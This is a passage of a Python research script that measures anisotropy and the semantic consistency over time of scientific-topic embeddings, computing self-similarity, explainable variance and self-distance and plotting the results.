linearmodels.panel import PanelOLS\nfrom linearmodels.panel import PooledOLS\nfrom linearmodels.datasets import wage_panel\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nfrom Utils import save_file, read_file, abs_file_path\nfrom CalculateMetrics import get_vec_func, calculate_self_similarity_func, maximum_explainable_variance_func, calculate_self_distance_func\n\n\n\n#%%\n\"\"\" \n Section 5.1\n Checking the quality of topic embeddings \n Show and exclude Anisotropy in our metrics\n\"\"\"\nFoS2Vec_path = os.path.join(abs_file_path, "FoS2Vec")\nFoSs = os.listdir(FoS2Vec_path)\n\n\ndef sampling_control_group(beg_year, end_year):\n \"\"\" random sample embeddings from different topics to construct vectors pool \"\"\"\n FoS2Vec_path = os.path.join(abs_file_path, "FoS2Vec")\n FoSs = os.listdir(FoS2Vec_path)\n sampling_size_2 = 100\n vecs_2 = list()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, beg_year, end_year)\n if len(vecs) == 0:\n continue\n if len(vecs) <= sampling_size_2:\n vecs_2.append(vecs)\n else:\n selected_index = np.arange(len(vecs))\n random.shuffle(selected_index)\n selected_index = selected_index[:sampling_size_2]\n vecs_2.append(vecs[selected_index, :])\n vecs_2 = np.concatenate(vecs_2, axis=0)\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n vecs_2 = vecs_2[shuffle_index, :]\n save_file(vecs_2, \"./temp/vecs_2.pkl\")\n return vecs_2\n\n\ndef check_for_anisotropy_from_self_similarity(sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\" demonstrate the 
anisotropy in the topic embeddings \"\"\"\n # 说明 相同FoS的向量相似性 > 不同FoS的向量相似性\n\n path_same = \"./temp/self_sim_same_dis.pkl\"\n path_diff = \"./temp/self_sim_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n self_sim_same_dis = read_file(path_same)\n self_sim_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n self_sim_same_dis = dict()\n self_sim_diff_dis = dict()\n for fid in tqdm(FoSs):\n # fid = 'artificial neural network.pkl'\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n self_sim_same_dis[fid] = calculate_self_similarity_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n self_sim_diff_dis[fid] = calculate_self_similarity_func(vecs, vecs_2, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n save_file(self_sim_same_dis, path_same)\n save_file(self_sim_diff_dis, path_diff)\n\n # 绘制分布\n x = list(self_sim_diff_dis.keys())\n y_diff = np.array([self_sim_diff_dis[i] for i in x])\n y_same = np.array([self_sim_same_dis[i] for i in x])\n y_sub = y_same - y_diff\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$SSIM(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$SSIM(V_j(:t))$ - $SSIM(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05}, # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"}\n ax = ax1)\n ax2 = plt.twinx()\n ax2 = sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": \"$SSIM(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n\n \n ax1.set_xlabel(r\"Self similarity ($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n 
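# editor's note (added, not in the original): the three distributions above contrast within-topic similarity (lime), the random-pool baseline that captures anisotropy (gray), and their difference (blue); the fixed [0, 1] x-range below assumes cosine self-similarity is bounded.\n 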
ax1.set_xticks(np.arange(0, 1.1, 0.1))\n ax1.set_xlim(0, 1)\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 35, 5))\n ax2.tick_params(axis='y',colors='gray')\n\n\ndef check_for_anisotropy_from_maximum_explainable_variance():\n \"\"\" demonstrate the anisotropy in the topic embeddings \"\"\"\n # 说明相同FoS的向量的MER更大\n \n path_same = \"./temp/mer_same_dis.pkl\"\n path_diff = \"./temp/mer_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n mer_same_dis = read_file(path_same)\n mer_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n mer_same_dis = dict() \n mer_diff_dis = dict()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n # 实验组\n mer_same_dis[fid] = maximum_explainable_variance_func(vecs)\n # 对照组\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n control_size = min(len(vecs), len(vecs_2))\n shuffle_index = shuffle_index[:control_size]\n mer_diff_dis[fid] = maximum_explainable_variance_func(vecs_2[shuffle_index, :])\n save_file(mer_same_dis, path_same)\n save_file(mer_diff_dis, path_diff)\n\n # 绘制分布\n x = list(mer_diff_dis.keys())\n y_diff = np.array([mer_diff_dis[i] for i in x]) # control group - random sampling\n y_same = np.array([mer_same_dis[i] for i in x]) # test group\n y_sub = y_same - y_diff\n\n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$MEV(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$MEV(V_j(:t))$ - $MEV(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"}\n ax=ax1)\n\n ax2 = plt.twinx()\n sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$MEV(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n \n ax1.set_xlabel(r\"Maximum explainable variance 
($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n ax1.set_xticks(np.arange(0, 1.1, 0.1))\n ax1.set_xlim(0, 1)\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 175, 25))\n ax2.tick_params(axis='y',colors='gray')\n \n\ndef check_for_anisotropy_from_self_distance(sampling_size_1, max_mp_num,\n min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\" demonstrate the anisotropy in the topic embeddings \"\"\"\n # 说明 存在anisotropy\n # 说明 相同FoS的向量距离 < 不同FoS的向量距离\n\n path_same = \"./temp/self_dis_same_dis.pkl\"\n path_diff = \"./temp/self_dis_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n self_dis_same_dis = read_file(path_same)\n self_dis_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n self_dis_same_dis = dict()\n self_dis_diff_dis = dict()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n self_dis_same_dis[fid] = calculate_self_distance_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n self_dis_diff_dis[fid] = calculate_self_distance_func(vecs, vecs_2, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n save_file(self_dis_same_dis, path_same)\n save_file(self_dis_diff_dis, path_diff)\n\n # 绘制分布\n x = list(self_dis_diff_dis.keys())\n y_diff = 1 / np.array([self_dis_diff_dis[i] for i in x])\n y_same = 1 / np.array([self_dis_same_dis[i] for i in x])\n y_sub = y_same - y_diff \n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": \"$SDIS(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$SDIS(V_j(:t), \\widehat{V_j(:t)})$ - $SDIS(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax = ax1)\n ax2 = plt.twinx()\n sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$SDIS(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", 
\"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n \n \n ax1.set_xlabel(r\"Self distance ($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n ax1.set_xticks(np.arange(0, 0.5, 0.1))\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 120, 20))\n ax2.tick_params(axis='y',colors='gray')\n\n\ndef results_for_VectorQuality():\n \"\"\" Experiments and results in Section 5.1 \"\"\"\n check_for_anisotropy_from_maximum_explainable_variance()\n check_for_anisotropy_from_self_similarity(1000, 7, 10, 1000, 1)\n check_for_anisotropy_from_self_distance(3000, 7, 10, 1000, 1)\n\n\n#%%\n\"\"\"\n Experiments and results in Section 5.2\n Analyze the evolution pattern of topics' semantic consistency \n (IM, DM, U-shape, Inverted U-shape)\n\"\"\"\n\ndef fit_quadratic_curve(time, y):\n \n def quadratic_curve(x, a, b, c):\n y = a * x**2 + b * x + c\n return y\n \n x = (np.array(time) - min(time)) / (max(time) - min(time))\n popt, pcov = curve_fit(quadratic_curve, x, y)\n y_hat = quadratic_curve(x, *popt)\n r2 = r2_score(y, y_hat)\n return popt, r2, y_hat \n\n\ndef plot_self_similarity(time, ssim, freq, fid, fit=True):\n \"\"\"\n time: 时间; ssim: 逐年累计self similarity; 逐年累计频率; fos name\n \"\"\"\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 3e3, 5), 500)\n \n plt.plot(time, ssim, label=fid[:-4], c='gray')\n plt.scatter(time, ssim, color='red', s=s, marker='s', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, ssim, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n adjust_text(freqTexts, )\n \n if fit:\n popt, r2, y_hat = fit_quadratic_curve(time, ssim)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"Self-similarity\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_maximum_explainable_variance(time, mer, freq, fid, fit=True):\n \"\"\"\n time: 时间; mer: 逐年累计maximum_explainable_variance; 逐年累计频率; fos name\n \"\"\"\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 5e3, 3), 500)\n \n plt.plot(time, mer, label=fid[:-4], c='gray')\n plt.scatter(time, mer, color='orange', s=s, marker='o', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, mer, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n if fit:\n popt, r2, 
y_hat = fit_quadratic_curve(time, mer)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"Maximum Explainable Variance\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_self_distance(time, dis, freq, fid, fit=True):\n \"\"\"\n time: 时间; ssim: 逐年累计self similarity; 逐年累计频率; fos name\n \"\"\"\n dis = 1 / np.array(dis)\n \n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 3e3, 5), 500)\n \n plt.plot(time, dis, label=fid[:-4], c='gray')\n plt.scatter(time, dis, color='green', s=s, marker='p', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, dis, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n \n if fit:\n popt, r2, y_hat = fit_quadratic_curve(time, dis)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"1 / Self-distance\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_all_metrics(time, ssim, mer, sdis, freq, fid, \n ssim_=[], mer_=[], sdis_=[], fit=True, normalized=True, cls_type=''):\n\n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 12\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n\n sdis = 1 / np.array(sdis)\n sdis_ = 1 / np.array(sdis_)\n \n ssim_normalized = (ssim - min(ssim)) / (max(ssim) - min(ssim))\n mer_normalized = (mer - min(mer)) / (max(mer) - min(mer))\n sdis_normalized = (sdis - min(sdis)) / (max(sdis) - min(sdis))\n \n ssim_normalized = (ssim - np.mean(ssim)) / np.std(ssim)\n mer_normalized = (mer - np.mean(mer)) / np.std(mer)\n sdis_normalized = (sdis - np.mean(sdis)) / np.std(sdis)\n avg_metric = (ssim_normalized + mer_normalized + sdis_normalized) / 3\n \n Y = [ssim, mer, sdis, avg_metric]\n Y_= [ssim_, mer_, sdis_, []]\n C = [\"red\", \"blue\", \"green\", \"black\"]\n S = [\"s\", \"o\", \"p\", \"+\"]\n Ylabel = [r\"$SSIM$\", r\"$MEV$\", r\"$SDIS^{-1}$\", r\"$1/3*(SSIM+MEV+SDIS^{-1}$)\"]\n \n for i in range(len(Y)):\n ax = plt.subplot(2, 2, i+1)\n if not normalized:\n Y_i = np.array(Y[i])\n else:\n Y_i = np.array(Y[i])\n Y_i = (Y_i - min(Y_i)) / (max(Y_i) - min(Y_i))\n ax.plot(time, Y_i, linewidth=1, linestyle='--', c=C[i], marker=S[i], markersize=4)\n \n # 轴刻度\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = math.ceil(max(Y_i) * 1000)\n down_y = math.floor(min(Y_i) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax.set_yticks(yticks)\n # ax.set_ylim(yticks[0], yticks[-1])\n if min(time) % 10 >= 5:\n down_x = min(time) // 10 * 10 + 5\n else:\n down_x = min(time) // 10 * 10\n up_x = 2025\n xticks = np.arange(down_x, up_x, 5)\n ax.set_xticks(xticks)\n \n # 对照组\n if len(Y_[i]) != 0:\n if not normalized:\n Y_i_ = np.array(Y_[i])\n else:\n Y_i_ = np.array(Y_[i])\n Y_i_ = (Y_i_ - min(Y_i_)) / (max(Y_i_) - min(Y_i_))\n ax.plot(time, Y_i_, c='gray', 
linewidth=1, linestyle='--')\n ax.scatter(time, Y_i_, color='gray', s=25, marker=S[i], alpha=1)\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(Ylabel[i])\n \n # 二次函数拟合\n if fit and i == 3:\n popt, r2, y_hat = fit_quadratic_curve(time, Y[i])\n ax.plot(time, y_hat, label=r\"${:.3f}t^2+{:.3f}t+{:.3f}$\".format(popt[0], popt[1], popt[2]) +\"\\n\" + r\"$R^2={:.3f}$\".format(r2),\n c='gray', linestyle='-.', linewidth=1) \n ax.legend(frameon=False, fontsize=11) \n ax.set_xticks(xticks)\n plt.suptitle(fid[:-4] + \" ({})\".format(cls_type), fontsize=20, fontweight='bold')\n plt.tight_layout()\n\n \ndef calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\"\n calculate original metrics\n Self-similarity; Self-distance; Maximum explainable variance\n \"\"\"\n year_list = dic.keys()\n year_list = sorted(year_list)\n start_year = max(min(year_list), 1990)\n end_year = min(max(year_list), 2018)\n \n ssim = list() # self-similarity\n mer = list() # maximum_explainable_variance\n sdis = list() # self-distance\n freq = list() # word frequency\n time = list() # year\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n # 逐年计算语义一致性指标\n SSIM = calculate_self_similarity_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n MER = maximum_explainable_variance_func(vecs)\n SDIS = calculate_self_distance_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n FREQ = len(vecs)\n \n ssim.append(SSIM)\n mer.append(MER)\n sdis.append(SDIS)\n freq.append(FREQ)\n time.append(year)\n return ssim, mer, sdis, freq, time\n\n\ndef calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\"\n calculate random metrics\n \"\"\"\n year_list = dic.keys()\n year_list = sorted(year_list)\n start_year = max(min(year_list), 1990)\n end_year = min(max(year_list), 2018)\n \n ssim = list() # self-similarity\n mer = list() # maximum_explainable_variance\n sdis = list() # self-distance\n freq = list() # word frequency\n time = list() # year\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n # 获取主题向量池\n shuffle_index = np.arange(len(vecs))\n random.shuffle(shuffle_index)\n control_size = min(len(vecs), 10000)\n shuffle_index = shuffle_index[:control_size]\n vecs_1_part = vecs[shuffle_index, :]\n \n # 获取等量随机向量池\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n control_size = min(min(len(vecs), len(vecs_2)), 5000)\n shuffle_index = shuffle_index[:control_size]\n vecs_2_part = vecs_2[shuffle_index, :]\n \n # 逐年计算语义一致性指标-基于随机向量组\n SSIM = calculate_self_similarity_func(vecs_1_part, vecs_2_part, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n MER = maximum_explainable_variance_func(vecs_2_part)\n SDIS = calculate_self_distance_func(vecs_1_part, vecs_2_part, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n FREQ = len(vecs)\n del vecs_1_part\n del vecs_2_part\n \n ssim.append(SSIM)\n mer.append(MER)\n sdis.append(SDIS)\n freq.append(FREQ)\n time.append(year)\n return ssim, mer, sdis, freq, time\n\n\ndef calculate_metrics_shuffle(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, 
sampling_discount_ratio):\n \"\"\" shuffle embeddings, calculate ssim, mer, sdis\"\"\"\n # 该主题所有向量构成的向量池\n all_vecs = list() \n for year in dic:\n all_vecs += dic[year] \n random.shuffle(all_vecs)\n # 类内乱序\n dic_shuffle = dict()\n for year in dic:\n sample_num = len(dic[year])\n vecs = random.sample(all_vecs, sample_num)\n dic_shuffle[year] = vecs\n # 年份洗牌后, 计算语义一致性指标\n ssim, mer, sdis, freq, time = calculate_metrics(dic_shuffle, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n return ssim, mer, sdis, freq, time\n\n\ndef plot_3d_func(fos, results, FoS2Vec_path, cls_type=''):\n \"\"\"逐年散点3d图\"\"\"\n dic = read_file(os.path.join(FoS2Vec_path, fos)) # fos的向量字典\n _, _, _, _, time = results[fos]\n beg_year = min(time) # fos的起始年\n end_year = max(time) # fos的最后一年 2018\n vecs = get_vec_func(dic, 1990, 2018) # 1990 - 2018 所有向量\n pca = decomposition.PCA(n_components=3) # pca \n pca.fit(vecs)\n vecs_3d_list = dict()\n for year in range(beg_year, end_year + 1):\n vecs_i = get_vec_func(dic, year, year)\n if len(vecs_i) != 0: \n vecs_i_3d = pca.transform(vecs_i)\n vecs_3d_list[year] = vecs_i_3d\n else:\n vecs_3d_list[year] = []\n dates = np.arange(beg_year, end_year + 1) # Time\n colors = np.linspace(-1, 1, len(dates)) # color bar \n\n # 绘图\n fig = plt.figure(figsize=(12, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 10\n }\n rcParams.update(config)\n ax = fig.add_subplot(111, projection='3d')\n \n xyzcs = list() # (x, y, z, color)\n cents = list()\n for i, year in enumerate(range(beg_year, end_year + 1)):\n vecs_i_3d = vecs_3d_list[year]\n if len(vecs_i_3d) == 0:\n continue\n \n samples_size = min(len(vecs_i_3d), 100)\n print(\"{}/{}\".format(samples_size, len(vecs_i_3d)))\n \n vecs_i_3d = random.sample(list(vecs_i_3d), samples_size)\n vecs_i_3d = np.array(vecs_i_3d)\n \n xs = vecs_i_3d[:, 0]\n ys = vecs_i_3d[:, 1]\n zs = vecs_i_3d[:, 2]\n cs = colors[i] * np.ones(len(xs))\n xyzcs.append(np.array([xs, ys, zs, cs]))\n cents.append(np.array([np.mean(xs), np.mean(ys), np.mean(zs), colors[i]]))\n # break\n \n cmap = 'seismic'\n cmap2= \"Greens\"\n xyzcs = np.concatenate(xyzcs, axis=-1) \n ax.scatter(xyzcs[0, :], xyzcs[1, :], xyzcs[2, :], c=xyzcs[3, :], cmap=cmap, s=2, alpha=0.4)\n \n # cents = np.array(cents)\n # points = cents[:, :3]\n # points = points.reshape(-1, 1, 3)\n # segments = np.concatenate([points[:-1], points[1:]], axis=1)\n # lc = Line3DCollection(segments, cmap=plt.get_cmap(cmap2), linestyles='dashed')\n # lc.set_array(cents[:, 3]) # 设置颜色\n # lc.set_linewidth(1.5)\n # ax.add_collection3d(lc)\n # ax.scatter(cents[:, 0], cents[:, 1], cents[:, 2], c=cents[:, 3], cmap=cmap2, s=15, marker='<') \n # ax.legend(frameon=False)\n \n # 轴刻度\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_x = math.ceil(max(xyzcs[0, :]) * 1000)\n down_x = math.floor(min(xyzcs[0, :]) * 1000)\n xticks = np.linspace(down_x, up_x, 5) / 1000\n ax.set_xticks(xticks)\n \n up_y = math.ceil(max(xyzcs[1, :]) * 1000)\n down_y = math.floor(min(xyzcs[1, :]) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax.set_yticks(yticks)\n \n up_z = math.ceil(max(xyzcs[2, :]) * 1000)\n down_z = math.floor(min(xyzcs[2, :]) * 1000)\n zticks = np.linspace(down_z, up_z, 5) / 1000\n ax.set_zticks(zticks)\n plt.title(fos[:-4] + \" ({})\".format(cls_type), fontsize=20, fontweight='bold')\n \n # color bar\n labels = [str(i) for i in dates]\n norm = Normalize(vmin=colors.min(), 
